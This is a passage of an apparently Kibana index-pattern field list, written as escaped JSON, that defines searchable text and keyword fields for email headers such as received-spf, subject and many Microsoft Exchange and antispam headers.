":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"infralogtype\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"infralogtype.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"infralogtype\"}}},{\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"message-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"message-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"message-id\"}}},{\"name\":\"message.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"message\"}}},{\"name\":\"mime-version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"mime-version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"mime-version\"}}},{\"name\":\"received\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"received-spf\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"received-spf.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"received-spf\"}}},{\"name\":\"received.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"received\"}}},{\"name\":\"references\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"references.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"references\"}}},{\"name\":\"return-path\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"return-path.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"return-path\"}}},{\"name\":\"subject\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"subject.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"subject\"}}},{\"name\":\"thread-index\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"thread-index.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"thread-index\"}}},{\"name\":\"thread-topic\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"thread-topic.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"thread-topic\"}}},{\"name\":\"to\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"to.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"to\"}}},{\"name\":\"x-account-notification-type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-account-notification-type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-account-notification-type\"}}},{\"name\":\"x-eopattributedmessage\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-eopattributedmessage.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-eopattributedmessage\"}}},{\"name\":\"x-eoptenantattributedmessage\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-eoptenantattributedmessage.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-eoptenantattributedmessage\"}}},{\"name\":\"x-forefront-antispam-report-untrusted\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-forefront-antispam-report-untrusted.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-forefront-antispam-report-untrusted\"}}},{\"name\":\"x-gm-message-state\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-gm-message-state.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-gm-message-state\"}}},{\"name\":\"x-google-dkim-signature\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-google-dkim-signature.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-google-dkim-signature\"}}},{\"name\":\"x-google-smtp-source\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-google-smtp-source.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-google-smtp-source\"}}},{\"name\":\"x-incomingheadercount\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-incomingheadercount.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-incomingheadercount\"}}},{\"name\":\"x-incomingtopheadermarker\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-incomingtopheadermarker.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-incomingtopheadermarker\"}}},{\"name\":\"x-message-delivery\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-message-delivery.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-message-delivery\"}}},{\"name\":\"x-message-info\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-message-info.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-message-info\"}}},{\"name\":\"x-microsoft-antispam\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-mailbox-delivery\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-mailbox-delivery.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-mailbox-delivery\"}}},{\"name\":\"x-microsoft-antispam-message-info\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-message-info-original\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-message-info-original.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-message-info-original\"}}},{\"name\":\"x-microsoft-antispam-message-info.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-message-info\"}}},{\"name\":\"x-microsoft-antispam-prvs\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-prvs.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-prvs\"}}},{\"name\":\"x-microsoft-antispam-untrusted\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-untrusted.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-untrusted\"}}},{\"name\":\"x-microsoft-antispam.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam\"}}},{\"name\":\"x-ms-exchange-antispam-messagedata\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-antispam-messagedata-original\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-antispam-messagedata-original.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-antispam-messagedata-original\"}}},{\"name\":\"x-ms-exchange-antispam-messagedata.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-antispam-messagedata\"}}},{\"name\":\"x-ms-exchange-authentication-results\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-authentication-results.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-authentication-results\"}}},{\"name\":\"x-ms-exchange-crosstenant-authas\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-authas.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-authas\"}}},{\"name\":\"x-ms-exchange-crosstenant-authsource\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-authsource.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-authsource\"}}},{\"name\":\"x-ms-exchange-crosstenant-fromentityheader\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-fromentityheader.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-fromentityheader\"}}},{\"name\":\"x-ms-exchange-crosstenant-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-id\"}}},{\"name\":\"x-ms-exchange-crosstenant-network-message-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-network-message-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-network-message-id\"}}},{\"name\":\"x-ms-exchange-crosstenant-originalarrivaltime\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-originalarrivaltime.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-originalarrivaltime\"}}},{\"name\":\"x-ms-exchange-crosstenant-originalattributedtenantconnectingip\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-originalattributedtenantconnectingip.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-originalattributedtenantconnectingip\"}}},{\"name\":\"x-ms-exchange-crosstenant-rms-persistedconsumerorg\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-rms-persistedconsumerorg.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-rms-persistedconsumerorg\"}}},{\"name\":\"x-ms-exchange-eopdirect\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-eopdirect.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-eopdirect\"}}},{\"name\":\"x-ms-exchange-minimumurldomainage\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-minimumurldomainage.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-minimumurldomainage\"}}},{\"name\":\"x-ms-exchange-organization-authas\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-authas.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-authas\"}}},{\"name\":\"x-ms-exchange-organization-authsource\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-authsource.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-authsource\"}}},{\"name\":\"x-ms-exchange-organization-expirationinterval\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-expirationinterval.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-expirationinterval\"}}},{\"name\":\"x-ms-exchange-organization-expirationintervalreason\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-expirationintervalreason.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-expirationintervalreason\"}}},{\"name\":\"x-ms-exchange-organization-expirationstarttime\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-expirationstarttime.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-expirationstarttime\"}}},{\"name\":\"x-ms-exchange-organization-expirationstarttimereason\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-expirationstarttimereason.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-expirationstarttimereason\"}}},{\"name\":\"x-ms-exchange-organization-messagedirectionality\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-messagedirectionality.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-messagedirectionality\"}}},{\"name\":\"x-ms-exchange-organization-network-message-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-network-message-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-network-message-id\"}}},{\"name\":\"x-ms-exchange-organization-pcl\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-pcl.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-pcl\"}}},{\"name\":\"x-ms-exchange-organization-recordreviewcfmtype\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-recordreviewcfmtype.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-recordreviewcfmtype\"}}},{\"name\":\"x-ms-exchange-organization-scl\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-scl.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-scl\"}}},{\"name\":\"x-ms-exchange-processed-by-bccfoldering\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-processed-by-bccfoldering.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-processed-by-bccfoldering\"}}},{\"name\":\"x-ms-exchange-senderadcheck\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-senderadcheck.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-senderadcheck\"}}},{\"name\":\"x-ms-exchange-transport-crosstenantheaderspromoted\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-crosstenantheaderspromoted.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-crosstenantheaderspromoted\"}}},{\"name\":\"x-ms-exchange-transport-crosstenantheadersstamped\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-crosstenantheadersstamped.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-crosstenantheadersstamped\"}}},{\"name\":\"x-ms-exchange-transport-crosstenantheadersstripped\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-crosstenantheadersstripped.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-crosstenantheadersstripped\"}}},{\"name\":\"x-ms-exchange-transport-endtoendlatency\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-endtoendlatency.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-endtoendlatency\"}}},{\"name\":\"x-ms-exchange-transport-forked\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-forked.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-forked\"}}},{\"name\":\"x-ms-has-attach\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-has-attach.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-has-attach\"}}},{\"name\":\"x-ms-office365-filtering-correlation-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-office365-filtering-correlation-id-prvs\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-m